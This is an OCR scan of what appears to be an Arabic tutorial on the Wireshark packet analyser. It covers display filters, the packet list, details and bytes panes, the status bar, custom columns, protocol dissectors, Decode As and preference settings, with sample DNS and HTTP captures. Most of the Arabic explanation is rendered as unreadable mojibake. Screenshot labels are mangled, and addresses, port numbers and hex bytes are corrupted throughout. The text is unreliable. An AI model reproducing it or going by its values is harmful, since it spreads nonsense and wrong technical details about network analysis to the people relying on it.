Display Filters- 
Coloring Rul#* 
Preferences 
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jJaiil Cy* t-iVVI dAi* j\ c uj-^ ".u^ ^ l>* *^J" ( ♦ 1 ^ >>1 ^ (Display Filter) o^j*^\ ^.vyimi 

C5 ic^ .^^jj ^1 ^jLuj cs-^' jjj*^' ^jjj (Display Filter) o^j*^\ J^U. ^ .l^a 



(Display Filter) o^j*^\ A'&a\ <Lg (j^a^J dujliVI 4£f*5 C5 ic ^q>^l a^A*. *lk^l t M t *y > nb ^ j£i c±£ lij & JUaII 



f.:c £dH Vte-.-. ']o Capture ^lulyze £tltH4ic5 Tdcphw^ Jc-ols yiCennata ifrip 

1KI ttK a Q K £ u »\ * * « T ± @ Q ^ ^ ^ E3 i E ^ St 



L 



Access 
slaved 
display Alters 



Oisplsy fiUnf area - supports 
jute-complete md error dEtsetion 



Drop-down 
Hast useo} 



Clur Hi* 
diapEiy 



L 



Create Filter Fitter 
EipnMion €xptt*9\<M 
huttetia button snei 



Expressions to AppV fiHcr 
help build filters to ir*ffi-c 



< (Packet Details pane)?j*^ J^^ii <> (Packet List pane) i> uj£" V-^J^ ^j^ 1 jjIjM u' ^ 

.(Packet Bytes) 











B*» &** Itf*** & £wtw* iwVM SMtetfcs T*»* 

siiftii - n * ^ , * 


* * T £ 


pig ^ □ 


Ml 13 & B 


filler - -■; ■ „•:-.'...-..;.... 



0.000000 24.6.173. 220 75.75.75.75 DNS 74 Standard query OxaeO 



O.iJl 1/5/ 
0.013971 
0.027695 
0. 028699 
O.O46071 
0.046258 



75.75. 75. 75 
24.6.173. 220 
75.75.75,75 
24.6.173. 220 



24.6. 1/1. 220 
75.75.75.75 
24.6,175,220 
74. 125.224.80 



74.125.224.80 24.6.173.220 
24.6.173.220 74.125.224.80 



DNS 
DNS 
DNS 

TCP 
TCP 
TCP 



St^rard query response 



Packet List Pane 



24. E. 173. 370 74 121. 724. SO HTTP 



154 

74 

66 

66 http > 35145 [SYW K AC*] Se 
54 35145 > http [ACKJ 5eq=l 



I 



Frame 1: 74 bytes on ^^7c^7592^^7^^^4T)yt^^^a^)tu!r^d^5 , 92Mj^s^T^ 



Ethernet II, Src; Hewle 

int-ernet Protocol Vers tot 4, Src: 24.6.17 3.220 C2^ 
user Datagram Protocol , Src Port: 51724 (51724), D? 
□onsain Name Systiem (query) 

fftp5nnnsp Tr>: ?1 



inter- 



Packet Details Pane 



3000 
10 L 0 

)0?0 
JO 3 0 
3040 



00 OX 5c 31 lib cl d4 £5 
OG 3c OS 3d 00 00 &0 11 
4b 4b ca OC 00 J5 00 2S 



64 a7 bf a3 OS 00 45 00 
00 00 18 06 ad dc 4b 4b 

5C b2_aa 



5 03 63 6f 6d 00 00 01 00 01 



06 67 Sf 6f 67 



Packet Bytes Pane 



) t •" Domain Nh-t* St^ic* (dn+3- bytw 



=-to»*iJ Prefix Drfault 



(Packet List pane) fj^l ^ - 

a^{c CjL<» jls^j i 4 o laajudAll cjikiflaiill jl cjV jjj^>JI c^jL^lJI ^jjqj - ^oll (Packet List pane) ^-aj^ ^3^^ l)^^ 

.(jLaJl CJlUH J jaxJI ."NO.") J^V^ L^^^ ^ J**^\ L-Laia. Jjill ^JJ tUk^ljJfll .<SjUuJ| 

(Packet List pane) f JaJ) Ljjj^ ^21) A^ljjflV) Sx^Sfl ^ Ui 

Number ("No.") column 

jllaxJl J J-^^ (J I Jfi^\ (S^^- dr^ ^ ^ ( ^3^^ 

Time column 

.Time column ci^j^ 3 Jj^ 3 ^^ c>j J^Ul^ 

Source and Destination columns - 

MAC u^j^ lSj^ W ^ j^V^ . J-M (Address Layer) d\y*l\ <^jllj j ^^ l s^^l 

.^-^ j^^ j j^oxll saacI 1VIAC cl^j^ c ' lP 3 ^^ ^ * >1 c> *u^ } (cJ^^^ cJ^f^ 'ARP r^3^) 

Protocol column 
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cjtLfLajl! U» aAjsu* JjI^j d±£ lij <ja jlaill lac ^jl£^ ligi . jUaVl ^^ic l^lnlaj ^2 dissector j^f lP 3 ^*^ ^J^ 1 



I http-googlelCd,p£Apr>g 



Length column 
Info column 



fd* £HM V*w £+f*tM 5H*tyiC JtMrAHif Ir^ipl^ny J_« !-. 

No. Tan* Source Oestiiuhon 

I 0.000000 24,6.173,220 75,75.75,75 

Z 0,013237 75. 75. 75. 75 24,6,3,73,220 

3 0.0007S4 24.6.173.220 75.75.75.75 

4 0.013724 75.75.75.75 24.6.173.220 

5 0.001004 24.6.173.220 74.125 . 2 24. SO 

6 0.017372 74.125.224.80 24.6.173.220 

7 0.0001S7 24.6.173.220 74 . 125 . 224 . SO 

8 0,000740 24.6.173.220 74,125 , 224. SO 

9 0.013703 74-125,224.80 24.6.173,220 

10 0. 054773 74. 125 . 224, SO 24,6,173.220 

II 0.002200 74. 125. 224. SO 24.6.173.220 



HOs et est a a h & ® 

Expr«-»ar\_ C-rjr Apply Save 
P rctac-ri LrfigSh Wo 

DN5 74 standard query Oxaeft 
DNS 1^4 standard query re spa 
DNS 74 Standard query 0x45 5 
DNS 102 Standard query re spa 
TCP 66 35145 > http [SVN] Si 
TCP 66 http > 3514S [SYN P A 
TCP 54 35145 > http [ACK] S 
HTTP 342 GET / HTTP/1,1 
TCP 60 http > 3 5 145 [ACK] S> 
tcp 14S4 [TCP segment of a re 
TCP 14S4 [TCP segment of a re. 



/oAaC-VI L_fli^. j iQ^ajC* t^likl till ^JJJ (Jjj jLall (j-^Vl J_)^ ^A^cVI (j-a (J^J (Jj3 



Qj h-Ttp googptiai pcaprsg 


















■ 1 _ 1 _ l_ 

|Fn.*rTLji5 r~iFip 






n u m at m m s 


x & a % * 


^ ^ -- J 








1 f*«'j 






; **" 1 t**jl r T 1 Q- ! t-ri3T'i-*' . 


-Apply 5*.-* 





0,000000 
0,013337 
0.000734 
0.013724 
0.001004 

0.00015? 24 
0.000740 24 
C01S703 74 



24. 
75 
24 
75. 
24 



6,173.220 
75-75. 75 
6,173,220 
75.75,75 
6.173.220 

6.1/3. 220 
6,173.220 
125,224,80 



75*75*75.75 


DNS 




24. 17 3. 230 


DNS 


154 


75.75.75.75 


DhS 


74 


24. 6L 173,220 


DNS 


102 


74 . 125 k 224 . 60 


TCF 


66 


24 e. 173, 220 


TCP 


66 


74.125 ,224 ,80 


TCP 


54 


74.125.224.80 


HTTP 


342 


24.6.173.220 


TCP 


60 



Frame 6: 66 bytes on wire C524S bits} f 66 
Ethernet II, src; cadant_3l:bbicl C00. 01 
internet Protocol version 4 r 5rc: 74,125 
Transmission control Protocol, src Port; 



t ■ ■• r,- !■:• 

l+S "S*f1iriLg 
Align Lrft 

Align Ejg*it {rWiufc} 
Lcl'jmn rf « <=n c « . . . 
Edit Column Deljils.., 



bytes cap 

;5c;3l;bb^-^-— 
,224,60 ^<-J_^£f!^i 



iokimns 



a- 

h 



C3 



idit i"tr*v £iMtyz* Stmirti^ 

9 i i d( ij 



.3L,' 



24. 6. 173. 220 
! 7S.75.75.75 

5 



r**ep*Kjn^ look- |hfl*™k H*lp 



5"cM nfll ■ :■ 

75. 7S. 75.75 
24.6,173.220 



3 

LO 



75.75. 75 . 75 
24.6. 17 3. 220 
74.125-. 224. SO 
24. 6. 17 3. 220 
24.6, 17 3. 220 

74-135.224.80 



2^.0. 1^3. 22 -J 
74. 125. 224. S< 
24.6.173.220 
74. 125. 224. S< 
74. 125. 224. Bi 
24.6.17^,220 
24.6.17^,220 



DNS 0.000000 74 standard query OxaeOb i 
DNS 0.01*237 154 Standard query response 

ffiffgem ■« jif d **m*Jh 

tandard 



■re 

. Ethernet II, Src: Hewlett-^aZ 
i Internet Protocol Vers i on 4„ 
- user Datagram Protocol , Src P 
■ Domain Hauie System (query 3 

QO0O 00 01 5c 31 l>t? cl d4 S5 

0010 00 3c OB 3e 00 00 SO 11 

0020 4t> 4b f7 6e 00 35 00 28 

0030 00 00 00 00 00 00 03 77 

0040 65 03 63 6f 6d 00 00 lc 



M.n'i FV: itC ^i: :|i ? >' 

5el Trine *tf*retiie flejgglcl 
Tinw Shtfl._ 

Edrt or Add Picket Cufflmtnl .. 

Appty 95 F±h<r 

Consc*i*liw Filter 
Cctanze CwnviuCiHi 

^CTP 

F«|l#w TCI* JUlrfrUtt 

faftWwW>P5fi*jrn 

m Prim... 



lard query response 
5145 > http [SYM] Seq=H 
ttp > 35145 [SYN f ACK] 
5145 > http [ACK] Seq*J 
^ET / HTTP/1. 1 
ttp > 35145 [ACK] Seq=] 
TTP/l r l 200 OK tte*t/J 



red C592 bits> on inter 
3} + 
173. 
Port: 



, Dst: Cadant_31:bb:- 
3. 220^^ Dst: 75.75. 7 ■ 
rt: domain (5 3> 



T .\l..,. d e . 

KK 

KK.n,5, ( VES, , . , 

w ww. googl 

e. cow 
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(Packet Details pane) J^at& * - 

jj! jll .4£jj^3I J^Lk Jilij ^jII 4_*jaJI U dbaJ (Frame section) J-^V' jti tlij] j£i U£ .(.k^ jV! * jaJI) ^ j^JI 

.jLL^I J>j 4jU.yi fij 4jU»yi 

.(Expand Subtrees) ^Sk j^Jj ^ J\ (Expand All) lUSIU <*j^jj! jUaVI 

(Packet bytes pane) <0^l * - 
Packet Bytes ^ i>j View <f>^ * lsj^ Au 3 V ^ .ASCII jl hex ^ j^V ^ 

a u ji Ai^y t*Ui j 



1 O.OGOOOO 24.6.173.220 75,75.75.75 



Fn* £dit Vie* £o £*p*urf Anjtyic Smistics T c leptn;ny Jcxais ]m*rn.iTs hjfip 

e m a «* # ■ n * s s 

Ffar 



m iifW 



* * ^ & .(©jSj q q « s w a 

Protocol Length Irrft * 

DNS 74 Standard query OxaeOb f- 



Fraine 1 : 74 bytes On wire <S92 bitS) K 74 bytes captured C592 bits) on interf 
Ethernet II, src: Hewlett-_a7 ;bf : a3 £04:8* :64:a7;bf :a3) , Dst : cadant_31:bb :c 
Internet Protocol Version 4, Src: 24.6.17^.220 (24, 6. 17 3 . 220) , Dst: 75.75. 75 
user Datagram Protocol, Src Port: 51724 C51724> > Dst Port: domain £5 3) 
Domain Name System (query) 

TResponse in: 21 

Transaction ID: OxaeOb 
♦) Flags: 0x0100 Standard query 

Questions : 1 

Answer RRs : 0 

Authority ft£s : D 

Additional rrs : 0 

Qu e r i e s 



n www. google. com: type A, clas 




ni Sr ^1 bb cl d4 S-5 64 a7 bf a3 OS 00 45 
HbVi^ I 00 00 SO 12 00 00 IS 00 ad etc 4b 4b 
Brtsvi™ 00 35 DO 2& 5c b2 ae Ob Dl 00 00 01 



KK. . . 5.( V . 



. E . 
. :<K 



O Tcscl fcefr, i^mcI). M bjtt, 



574 P f4 Ma?k<rd: 0 Load lifne: 0... Profile: Default 



c> (Status Bar) *JLJI u_Aj .^j^ j^'jii J»-l ^j-H (status Bar) ^j^> J\ 

.SjjjjJall L-Ijua^ oAacVI a JJJJU .SAaC-I jljjVI 



Qjf J C: -1rKt^-g«Mfir ht1p-gocg!tlS].F^JF ^5 KS-jC S... P^:j-4h. J7^ Displty«i JJ* Marked-. -I' Lcj.j cimg tMBJMft Ptcftie C JatJ 




Field, eiplurv or1»e« file Informillon 



J L 



PicfceS coitwt and! tud tirna Iflforma'icri 



Currant pralilc 
in u*e 



Expert Iflfoa 
button 



(j^ 1 ^ Jj)The Expert Info button 

<j jl Jjir'n 4_S£jouJ| ^ jj L-Lud^ ^^ic 4J| A^jj .^bV! (J^Laui ( . Ujuj Aj^J ^^^ic til^cLaiJ ^jl (j^J c5^^ Jj;^ II ^aUaj til! ^JJJ t^ljLuJ jj| jll 

[The highest level is Errors] ij^Vl 
[The highest level is Warnings]^ c5 ^\ : j^VI 
[The highest level is Notes] ^^^^ ls ^\ \ls 
[The highest level is Chats] cjL^jJ! j& ^jl^ ^Jc\ >lSjjll 
[comments, but no Errors, Warnings or Notes] cjUi^L J &\ jji^i c^U^kl V jSlj ^ja. £A*i ^ jj : j^^VI 

[There are no Expert Info items] ja^JI ^Uij Jja ^ Sjijia cjUjIx^ J\ j^jj V :^^Uj 

The trace file annotation button 
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First Column: Get Field, Capture, or Trace File Information 

CjLg jlstxi ^ jli .<Ja jjc- (Jj^j CjULJI j AjfT^JI .LLaj^l/^jjjll diliL hq^j tiljUi jjI jll <jla ^ j^JI laLajll 

li& J^-laJ .ciljUjj jj! jll 4_Ljail ^aJ £f^l L_flL* ^joj! jl ojLoi^j ^JJ ^3 (^^1 dlS^Jl £JJj3l L_aL» ^jujI j* laJ -lalijlVI dAiLa 

t c aLall 11a J-ac jl ^lia Sa^ j t aLall ^-^1 ^ 

Second Column: Get Packet Counts (Total and Displayed) - 

<jJajjx-<Jl ^aj^Jl Ac p\ > nj^ ^I^JjujI AjCj lis jQ^ a JJ*-!l jl -la ji^all s-l jjoj £JJjJl L_flL* J C5^^) ^ J**^^ ^ li^A? 

. Dropped^^ J SjjliJI ^ >JI j Displayed 
Third Column: Determine the Current Profile 

' HTTP JJJ* ^J** (Jjlskjj ^ j£j d£ lij 6 JtlxJl ^if^ ^s^- .S^A^g CIjVI^ Jc- liljUj jj! jll (j^aJj^kjl ^JJXJ djUL e-Lij] ^lVs aJ 

j&j* J .^Lkll Lkk [HTTP 5XX] jl J^l [HTTP 4XX] 5^ ojjfcll j — y g^l cJuj*j]| L_aL ^t;<^ 

JaJjjai (j-G (j-aJ^I .J ^*-!l J Jajuijll £jJa jll (jlajC ^aJJ , HTTP C ^-<^ ^ Ailj^alj ^a^l 

j^j L_flJjsu c flLa Aj,Jj*j3 I^jAjcI c ^j3I L_flJjxj3l CjliLa I^JS <Lajta cill J^-laJ ^ > /Ml J ^axJI jLall J*jjjV1 jj^-J j£jl .(j^AjuJ! 



djLi j.) jil VIEWj SETTING 
(Add Columns to the Packet List Pane) ?>^t * J! SaapI 

<c jjaij til^cLojj (jl (j^-GJ oA^cVI AiUial (jla ttilli ^ j .AjjojLojVI djUi jlx-<J! ja jj* ^^ill SaacVI AjjJaljjal <c ^ tiljUjj jj! j3I ^jj^j 

I 4iLjaV (j^J^ ^ (> ^Sll 

.(J^jojI <Lj]a ^I^JjojIj oA^cVI 5-Ujdjl (j£-oJ V (jU^-VI (J^a*^ 

Right-Click I Apply as Column (the "easy way") 

Jjj^lij* £ j^. ^ dijjjjVI <J j^>^ l$\ (^z* Cy*S^\ jj^-t jfi^ 1 .^l j^VI ^ 6.jjI jll ^jill j J j^-^ ^3^^ lS^j^^ o^^s 
.<l^aJI AijjiJl ^ £>i&j .Apply as Column ^^jj J^JI l>^^^ l>-jIaJI jjl^ j^j J^- AiUiaV 

Ejipsnd All 



j http-r'sp.n IC S.pcflpng 



1 O. O0€OOO00O 





a* 


s a x a 





24.6.1 



Apply « Colunn ^-n^Ji^^ 
Apjjl^/ Fitter 
P r«p-* re * Fitter 
C«*o*i« wirti Fifcti- 

Folk?!* TCP Scream 
Fallen* UlpPStre*m 

Follov* SSL Slrcjm 



"OTcT i |i ia e » 



DNS 



[Time- to I^ C fcfp 
12S| S t an<iar d 



query 0^ 



Internet Protocol Ver ^ Wifci P™t«:«i * 
Versi on: ■» w f ifte*- Pi=rd fin***™;*! 

Header length: 20 b"; ProtMo! H^p 

> Oif ferentiated Se'-rv Preload P Jt fc»*™:«s 

Total Ungth: S3 ^ A 

Identific^t^n: 0^6;^°"^^- 

■ Flagi- OyOO v OrM&^PHAKcd... 

Fragment offset: O . 

^^BZf^STWRI?3lBiU^^lBE So CorrKponding ParkM 

Protocol : UDP CJ-^U 



!20 C24.6, 173.220) , Dst: 75.7 5.- 

* OxOD: L>pfauH; K'N: OxOO: Not -I 



Header" checksum: 0x0000 [validation disabled] 
source: 24.6.17 3.220 £24.6.173.220) 
Destination; 75.75. 75. 7S £75 . 7 5 . 75 . ? 5} 



0010 00 3a 62 2a 00 00 Ejlfi 11 

0020 4b 4h cf cO 00 35 00 26 

0030 00 00 00 00 00 00 03 77 

0040 63 Gf 6d 00 00 01 00 01 

O i" ' Tunc tp Invc (^■-ttl>. I byt* 



00 00 IS 06 ad dc 4b 4b 
5c bO 02 21 01 00 00 01 
77 77 04 65 73 70 6e 03 



:b*..l. ... 

KK. . . 5. A \. . 

,W WW. 

corn. - . , , 



. . . KK 

t 

espn , 



■ 



PactcAs: D^played: 490Q Ma... Prriilc DrfaiWH 



Edit I Preferences I Columns (the "hard way") 

<Lj]a ^hVlml ^UaJ L_fl jjoiS t^j-dJ^I (JjJ J^l jjlU ji^l ^Jjia J ^Lal^kj mV L_J jlSa^ll J^Jl Jc ^ JJ^J ^ ^! 

Preferences j 'Sj^j^^ J Edit tij^ u-* c^j .^a^VI ^UJ ^^^ 1 j ^ j^l 

/oA^cl AiUialj toA^cVI j^f*^ SaacVI ^-jj^ Columns ^ l>^j 

U£ ^Filed Type J Custom ^> j add j j^^ tij^ 4^ ^ajL^I ajjj ^ill ^ ^axJI j jjuj ^jj ^1 lil 

tilli j .A ^axJI J <jJajC Ajjj ^ill J^^j ^ (j-« J (ip.ttl) J J^-^j ( ; ^> J ''j^' J -C5^^^ lS^^^ J 

.Field occurrence J^Jl J ^ j <> 
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Uhi Interface 
Layout 

F(Hlt 

Colon 
Printing 

Hunt ft#ra&niori 
>:*: H 



FJh*finrt kri erfiy be dapiiyed +t Hii 
Clayed Trile F*Wtyp* 

V Time Tu-ne ffo^mit «. sp«rfierfj 



E3 Tinwtcivc CatfoaHtpJtf] 



V Dertj^rttor* Dedjn<t>wi arrets 

V Pnototci ftoto«>l 

' Info Worrnalren 



leftiiofl colucr**! ■ Ct*5 and drop? *rfn<s "o chjrvgc tGSji"i ^cter] 




Fitfd wcun-ence 0 



Hide, Remove, Rearrange, Realign, and Edit Columns 

^jjujI 11a ^jjjJ j ttiL 4 > *al \\\ saacVI Jc- c ajl la jll ^ ^j^xJI *taV ILLoj l^Ld^kjjojl jll Preference ^iaU ^hvi ml cilj£ ^ 

lj l^j] ^y^- J ^ J**^^ L)\ J^ L)^y\ <J^-^> 6-^C-VI <J-alxj3l Lkiajl (j^J Cilia /oA^cVl iS^xll 4_Llojj 

S^lcV J^iJl Jl jl (j^^l J] ^1 J^l L-1^j u j jiJl L_fli^. <J^> jl 6^ ((jlajC jl) elia*] J-**-!l (jl L^-^ tftl^l a all 



| IhCtp-rjpnlOl.p: jpr-g 



f.If £dn !i* £*pi(** fifthly** Jtanwwfi T**e*mnsft£ Ice in friltwuili tf*tp 

u u m mm egxs^ <\ * * « t a ® a u <a □ 

Rfton 

510 3.24766* 12 

511 3. 2 479 IS 12 



t-5«rl A-sctiidirvg 
Son. D*aiDendir*g 
Kg Scrting 



S4. 222-48 HTTP 476 GET /pr 



p4_??2.4& HTTP 
5,75.75 DNS 
5. 75. 75 DNS 



A:.yn Left 



internet Protocol 

Vers "fori: 4 

Header length: 2^ 
sj Differentiated Si *f Cofcimn pe«fe*tn«f 

Tata! Length: 46. B 5drt o*imn Oct**.. 

I den t i f i cat ion: < c-^mn 
eaFla&s: 0x02 CDon W8p ^ Ki c 9lmv 

Fragment offset: ^^t™ 

Time to live: 12; a ^^crt,™ 

Protocol: TCP C6y ■ 



2/01 



466 GETT7photo/2012701 
74 standard ejuery Oxd 
74 Standard q?uery Oxe 



173,220 <24.6.17J.220>, Dst: 1S4„&4.2^ 
CDSCP OkOO: Default; ecn : OxOO: Not-ECT 



!] 



000 0 00 01 5c 31 bb cl d4 SS 64 a7 bf a3 08 00 45 OO 

001 G 01 ce 62 el 40 00 dO 06 00 00 18 06 ad dc 5-4 

0030 de JO *d fl 00 50 &f c2 t>2 6f 10 34 75 64 30 16 

0030 40 29 5e 2S Ofl 00 47 45 54 20 2f 70 72 6f 64 2f 

O *^ f *t =^n*<r;- c<«>rtqiflVhti... P*cfceti- 4»0 Cspiftt* U# rice* <i Lo*tf tinnr 



- -b,* . T 

,0M r ,P. r ,0.4udP, 
©>Ar. .GE T /prod/ 



Export Column Data 

.CSV f5 Export Packet Dissections ^ l>j File Aft* A ^Time to Live ^ 

.CjUUJI ^ ^jjJI ^UJUJ CjUUJI J ^ CSV ( ^ 
(Dissect the Wireshark Dissectors) Wireshark Dissectors ^a*-! ^j^t 

^ ^ c/^^ j* ^ .Core Engine Wiretap Library ji Capture Engine c> H J-^ 

tiljUjj jj! jll a laJLuij lIii^ ^Cjlinialillj CjV jJj^)JI ClAiLjqijj (JA ^jAslSI ^J9J tiljUjj jj| jll ^jl Cilia ^aja^U (JajlSI 



.6^1 jail aJjIS j^j Jj^JI (3^^ Dissectors 

^ .cIaj j^V! ^ ^ HTTP GET l?^^ Ethernet J^l <^ Host Jl « J^ 

.dissectors ^> <^ jaJl dIa lUUjII 
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Frame Dissector - 

i (t$j liaS (jj>l\ f jaJt Jaliill ^uL^ lSj^ ls^ ^-flLJI) Trace File J ^L^VI dUjkJI q^jxjj o-a^ij Frame dissector 

.cjI jlLVI l£ ^ timestamp 



a Frame 8: 345 bytes on wire C2760 bits} h 345 bytes captured (2760 bits) 



Interface id: 0 
WTAP_ENCAP: 1 

Arrival Time: Oct 24, 2012 15 : 05 : 09 . G99S83000 Pacific Daylight Time 
[Time shift for this packet: 0.000000000 seconds] 
Epoch rime: 13 51116 309.699888000 seconds 

[Time delta from previous captured frame: 0.00084 7000 seconds] 
[Time delta from previous displayed frame: 0.000S470O0 seconds] 
[Time since reference or first frame: 0-1404 7 5000 seconds] 
Frame Number : 8 

Frame Length: 34 5 byt*s C2760 bits) 
capture Lengthy 345 bytes C2760 bits) 
[Frame is marked: False] 
[frame is ignored: False] 
[Protocols in frame: eth: ip: tcp: http] 

[Coloring Ruli- N^me; UTTPj 

[Coloring Rule String: http I I tcp.port == 60] 



The Ethernet Dissector Takes Over - 
^ j^Aj <yr^ ^ -Type JS^JI cjLjI^ J] tatnJ < Ethernet II j ^VU^ j± ^jj ^ ji> Ethernet dissector 

.IPv4 ojj^ u-b J 1 J^ 5 A 0x0800 J) Field 



Ethernet II, 5rc; Hewlett -_a7:bf :a3 Cd4!S5:64:a7:bf :a3) T Dst: 
.♦Destination: Cadant_3l :bb :cl COO :01 : 5c : 31 :bb: cl) 
"purrr J lirnlnu V 7 bf :a3 (d4:B5 :64 :a7 :bf : a3) 



Cadari 



Type: IP (0x08 00 ) 



The IPv4 Dissector Takes Over 
gr* Protocol JSaJI <ajS tgJtil! Jiuill .Protocol aLji^ ^il-jj <IPv4 header Jj^ ^j^j IPv4 dissector 

.TCP £f£ jlj^l ^llj TCP 6 



Internet Protocol Version 4, Src: 24,6.173, 220 (,24.6. 173. 220) s Dst: 
version: 4 

Header length: 20 bytes 
GD Differentiated Services Field: 0x00 (DSCP 0x00; Defaults ECU: 0x00 

Total Length: 331 

Identification: 0x20be (S3o2) 
♦ Flags: 0x02 (Don't Fragment) 

Fragment offset: 0 
J^mCto live 



Protocol : TCP (6) 



II i nil I | In i I -HT nnnn [validation disabled] 

Source: 24.6.173.220 (24.6.173.220) 
Destination: 198.66,239,146 (198.66,239,146) 



The HTTP Dissector Takes Over 



f% dissector >l j* I V ^ <HTTP > d^b jl JA&J* ^ ^ V .HTTP Packet cWI U 



Hypertext Transfer Protocol 
GET / HTTP/1. l\r\n 

Host: www. chappel lu + com\r\r 
User -Agent: Mozills/5.0 (windows 



U; windows NT 6.1; en 
Accept : text/html ,appl ication/xhtml+xml , appl icati on/xml ; 
Accept-Language : en-us ,en ; q=0. S\r\n 
Accept-Encoding : gzi p t deflate\r\n 
Accept-eharset: ISO-8859-1 h utf-S ; q-0« 7 f * i q-(h 7\r\n 
Keep -Alive: 115\r\n 
Connection: keep-al i ve\r\n 
\r\n 

[Fiji 1 request vri: http : //www, chaopellu . com/1 
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^jL dii^ .137 j iiiftll FTP ^ ^ ^ -Lr^ dissector jj! j]| ? j±] (J^ki 

.NetBIOS jjj* ^j^h ^ ^ ^ij^ jjjJi 

"netbios-ns" ^ Protocol TCP <^j* ?jk ^J 1 ^ V NetBIOS jjj* 

aj^UJI Jjj^aliiill C5 lc ^ jl^J V Info ^ djUjla^ ^jl ^aia a aL&li li^ djUjla^ ^ Jiiill .Info ^ j**^ <^ ^-^1 Aikia ^ 

.NetBIOS a— Vl 



£<*«. v.*w» £o £spiuf* &n4ty» Slrtdfrc* T**tp4w^ I©c«s |r**«ni* a* 

fit *( ft *C & G3 K 0 a %^>^^7^ (HQlS (ilQ^E Vt W *? ^ H 

Time Saurct D«tinaticn Pre'ctnl Length lnfc^ 

7 , 104 TCP 

0.00004)0 207.137,7.104 207.137.7.103 TCP 

0.027000 207.1 J7. 7. 103 207.137.7.104 TCP 

0.0 J 3000 207,137,7.104 207.137.7.103 TCP 

0.03&000 207, 137. 7. 103 207.137.7.104 TCP 

0,040000 207.137.7.104 207.137.7.103 TCP 




.Uj^j dissector <^ 

c^ 3 ^ dissector ^J-^> jjIjH ^ lij (l) :jj^3I ^ Uj^ dissector ^ m^j^ ^ ^ uWf^ 

jl ^ dissector ^ j^^^ ls*^ (2) ^^a3I ^1^1 ( jjj^^ l Jj^j^jj^^ ^l^iuit 

dissector ^5 ^1 JjSjjjjJI j\ ^Vl ^jLJ! j jj jSjj t '^j^ ^ dissector u^j^ 

s^j^jJI Analyze c3j^ c> Decode As j^-^j ? ^ ^ cr^^ ^ ^ > ^ 



.Ljjlk^l dissector j^j Transport tab ^ .Decode As ^ c>j ^^J^ 

jj^" l^jL TCP o*\J l9ja ^ ^ ^ ^Hj^k ? jk ^ dissector ^ V ^jUi jjI j3! .80 t> 48600 

^jix^l! cjV j£ jj jjJI (jiasu ^ ^^WJ^ ^ jU^J heuristic dissectors ^ijl^ jjI j3i ^^n»n t<!UJI ^ ."djUUj 



81 ^i«3t Jjj c> jjj^' ^j^ 1 j^^^ ^ U?j <>J^\ .HTTP protocol's preference settings 

Protocol c>j Preferences c> j J Edit tij^ j^l c> ^ ^ .HTTP jjj^^j^ 

i^Vl^ ^j^Jl ^-uj^ f^j t * a j tU; Port list J <y-a*31 <jUJI J .HTTP ^jjuj 11a U31iu» J j£ jjjjJI 



hPypertesrt Tr-anrftr Prtrta-col 

ReflMemblc HT Tf" hwdenipamimg maiHiple- TCP scgmnHc [gj 
R**5*C*Tible HTTP b^dn^ ip^riun^ rawjJtipIt TCP scigme«i|?; 

Ke»5scrnWcchunkDC7Eltr«r^sfe<--codcid bodies: J 
< o«*pf*sa entity -bodies 



Some applications 
all ow you to add or 
change the port setting 



TCP Porte B0 J St..31£8.31 32. 59a5JBQGQ J BQ9&. S 137J.19CW-.23e9, 



£da... 



Ujc^ .<j ^Usll cili£ <>j jjj^j c^lli ^ ji&l Ui c^SUa ^jSI j ^Preference ^l^l^cj ^1.^ nub oa^cI 3iLja] ILLoj Il<Au _<JUi J&\ 
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ajjoljj jll 4_aj1I3I Edit tjj^ c> cJ yr^ j Preference s j^j yilj 

.Preference 



Wireshark: Preference • Profite: Default 



Layout 
Columns 
Font and Coloft 
C apture 

F-ilftr txpren,ioni 
Name Resotutro-n 
Print mq 

ES Pr&toco-tt 

■ ■■f.,N:h.--. 



Save window position: 
Save window sizes 
Save maximized states 



Check Tor updates: 



Open a console window Never 

H File Open" dialog behavior Remember last directory 

Directory; C:\Users\jan«\Oocum>rni •.. 

"File Open" preview timeout: 1 3 



13 



O Always start ini 



Maximum recent filters: ID 
Maximum recent files: 
Confirm unsaved capture files^ 
Wrap to end/beginning of file (luring 3 find: 
Settings dialogs show a save button: 
Welcome screen and title bar shows version 
Auto scroll on expansion: 



m 
m 

Roth 

n 

Auto scroll percentage: 0 
Display icons in the Expert Infos dialog tab labels: □ 



] Q Apply 



Edit I Preferences I User Interface 

Edit I Preferences I Name Resolution 

. IP address resolution' port'MAC address lW*% ajLjUi J o^jc* y-i ^^Luj 

AijlL *uJ J\ MAC ol^ t> Jj^ *£»2t jjljll ct^ljai :MAC name resolution - 

JJ^ill c> V^a "ftp cAUa1\ Jaj Jj£jjjjj" JS* , Transport names :Transport name resolution 

^ ^ l^jjajcj ^c-oUjJI t^Li <JA^ tiljUi jjI jll ^ (service) <--^-^Jl l ^ ikl^l ; t^l^ ^jj dia 5 21 

jjjj 4 Jliall o^ii^aJI <^ jj til jUi jjIjII ^jjj ci& lij :Host name resolution 

jj^j jl c_jj>j jSl j .Network Name Resolution c> 6 (IP u'j^ t> ^ www.wireshark.org 

i^UJI ^^lill CjUL ^ j^Sij ^JLjaVI a^j^JI j .< inh^l ^UjojI J jj^J] DNS Pointer (PTR) Jj^jj 

.DNS fSl-J c^^ 3 ) c3^3 ^jj 
^ jSlj ^Preferences J-^ c>j ^^J' i> View cij^ <> 1^1 name resolution ^=4 

Edit I Preferences I Filter Expressions 

(Trace file) £f£^ cjUL <c j*^ j\ j ji ajja ^ > ^q^ l (Display filter) j 3 ^^ ^ >iki^ 

Edit I Preferences I (+) Protocols 

^ J£U^ l_u^j q\ jSaj 4ii3 tUxial jsil ^ i^c-VI I^a : Allow subdissector to reassemble TCP streams 
(200 OK JS*) ^Ul^V! ^1 jSI ^ J^JI H^f^ HTTP f l5 lij di^ .HTTP jjj^ ^ 

.*UJ ^ ^ .(JjSjjjjJI dUU s^j) "[TCP Segment of a Reassembled PDU]" 
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TCP reassembly enabled: 



TCP reassembly disabled: 

l^jk lJ^xjII <J o^j 'TCP JL^I I^ILujjI ^jj Jll ^UUJI cjjIj jiixj :Track number of bytes in flight 
U3U l^jlc jaull J Jll cjUUJI Ul jjjJ ciljUi jj! jll \v< ."bytes in flight" A c.^- jVl J^ 

Jjj^alij * J TCP L^f ^aLa (fiU^I ^cjJa ^ U£) ^joiS <jLaJ) ^JJ ol^VI I^A jj£ *J £c .TCP ^->Vt^l J 

.TCP > ^1 (J^^ ^ AP*^' cJ^H I^A *Ij <jl .^jaJl 

TracA: number of bytes inflight enabled: 

B [SEQ/ACK analysis] 



[Bytes in flight: 2920] 



